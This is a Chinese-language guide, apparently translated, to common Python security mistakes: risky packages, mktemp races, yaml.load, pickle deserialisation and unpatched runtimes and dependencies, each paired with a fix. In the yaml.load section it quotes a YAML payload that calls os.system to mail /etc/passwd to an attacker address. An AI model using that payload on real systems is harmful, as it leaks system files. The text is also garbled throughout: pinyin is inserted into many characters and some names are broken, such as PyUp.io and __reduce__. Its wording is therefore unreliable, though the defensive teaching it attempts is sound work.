Python的導(dǎo)入系統(tǒng)非常靈活。當(dāng)您試圖為您的測(cè)試編寫(xiě)monkey-patch或重載核心功能時(shí)，這是非常棒的。

但是，這是Python中較大的安全漏洞之一。

在您的站點(diǎn)包中安裝第三方包，無(wú)論是在虛擬環(huán)境中還是在全局站點(diǎn)包中(通常不建議這樣做)，都會(huì)暴露這些包中的安全漏洞。

曾經(jīng)出現(xiàn)過(guò)這樣的情況:發(fā)布到PyPi的包的名稱(chēng)與流行的包類(lèi)似，但執(zhí)行的是任意代碼。幸運(yùn)的是，并沒(méi)有造成傷害。

另一種需要考慮的情況是依賴(lài)項(xiàng)的依賴(lài)項(xiàng)(等等)。它們可以包含漏洞，還可以通過(guò)導(dǎo)入系統(tǒng)覆蓋Python中的默認(rèn)行為。

解決辦法:

審查你的包?？纯碢yUp。io和他們的安全服務(wù)。為所有應(yīng)用程序使用虛擬環(huán)境，并確保全局站點(diǎn)包盡可能干凈。檢查包簽名。

臨時(shí)文件

要在Python中創(chuàng)建臨時(shí)文件，通常需要使用mktemp()函數(shù)生成一個(gè)文件名，然后使用該名稱(chēng)創(chuàng)建一個(gè)文件。這是不安全的，因?yàn)樵谡{(diào)用mktemp()和第一個(gè)進(jìn)程隨后嘗試創(chuàng)建該文件之間的時(shí)間內(nèi)，另一個(gè)進(jìn)程可能會(huì)創(chuàng)建一個(gè)具有該名稱(chēng)的文件。這意味著它可能欺騙您的應(yīng)用程序加載錯(cuò)誤的數(shù)據(jù)或暴露其他臨時(shí)數(shù)據(jù)。

如果調(diào)用了不正確的方法，Python的最新版本將發(fā)出運(yùn)行時(shí)警告。

解決辦法:

如果需要生成臨時(shí)文件，請(qǐng)使用tempfile模塊并使用mkstemp。

使用yaml.load

這個(gè)例子可以在流行的Python項(xiàng)目Ansible中找到：

https://talosintelligence.com/reports/TALOS-2017-0305

您可以提供Ansible Vault，該值作為(有效的)YAML。它使用文件中提供的參數(shù)調(diào)用os.system()。

!!python/object/apply:os.system ["cat /etc/passwd | mail me@hack.c"] 

因此，從用戶提供的值有效地加載YAML文件會(huì)讓您很容易受到攻擊。

解決辦法:

使用yaml.safe_load。

Pickles

反序列化pickle數(shù)據(jù)和YAML一樣糟糕。Python類(lèi)可以聲明一個(gè)名為_(kāi)_reduce__的神奇方法，該方法返回一個(gè)字符串，或者一個(gè)元組，該元組具有可調(diào)用的參數(shù)，在pickle時(shí)調(diào)用這些參數(shù)。攻擊者可以使用它來(lái)包含對(duì)其中一個(gè)子進(jìn)程模塊的引用，以便在主機(jī)上運(yùn)行任意命令。

解決辦法:

永遠(yuǎn)不要從不可信或未經(jīng)身份驗(yàn)證的源解除數(shù)據(jù)pickle。而是使用另一種序列化模式，比如JSON。

使用系統(tǒng)Python運(yùn)行時(shí)而不打補(bǔ)丁

大多數(shù)POSIX系統(tǒng)都附帶了Python 2的一個(gè)版本。通常是舊的。因?yàn)?ldquo;Python”，即CPython是用C寫(xiě)的，所以有時(shí)候Python解釋器本身就有漏洞。C語(yǔ)言中常見(jiàn)的安全問(wèn)題與內(nèi)存分配有關(guān)，因此緩沖區(qū)溢出錯(cuò)誤。

多年來(lái)，CPython有許多溢出或溢出漏洞，每一個(gè)都在后續(xù)的版本中得到了修補(bǔ)和修復(fù)。所以你是安全的。也就是說(shuō)，如果你修補(bǔ)你的運(yùn)行時(shí)。

解決辦法:

為您的產(chǎn)品應(yīng)用程序安裝最新版本的Python，并對(duì)其進(jìn)行修補(bǔ)!

沒(méi)有修補(bǔ)您的依賴(lài)項(xiàng)

與不修補(bǔ)您的運(yùn)行時(shí)類(lèi)似，您還需要定期修補(bǔ)您的依賴(lài)項(xiàng)。我發(fā)現(xiàn)在包中“固定”來(lái)自PyPi的Python包版本的做法很可怕。這個(gè)想法是“這些是可行的版本”，所以每個(gè)人都不去管它。

當(dāng)存在于應(yīng)用程序使用的包中時(shí)，上述代碼中的所有漏洞都同樣重要。這些包的開(kāi)發(fā)人員會(huì)修復(fù)安全問(wèn)題。所有的時(shí)間。

解決辦法:

使用PyUp這樣的服務(wù)。io檢查更新，提出拉/合并請(qǐng)求到您的應(yīng)用程序，并運(yùn)行您的測(cè)試，以保持包的最新。

使用InSpec之類(lèi)的工具來(lái)驗(yàn)證在生產(chǎn)環(huán)境中安裝的版本，并確保修補(bǔ)了最小版本或版本范圍。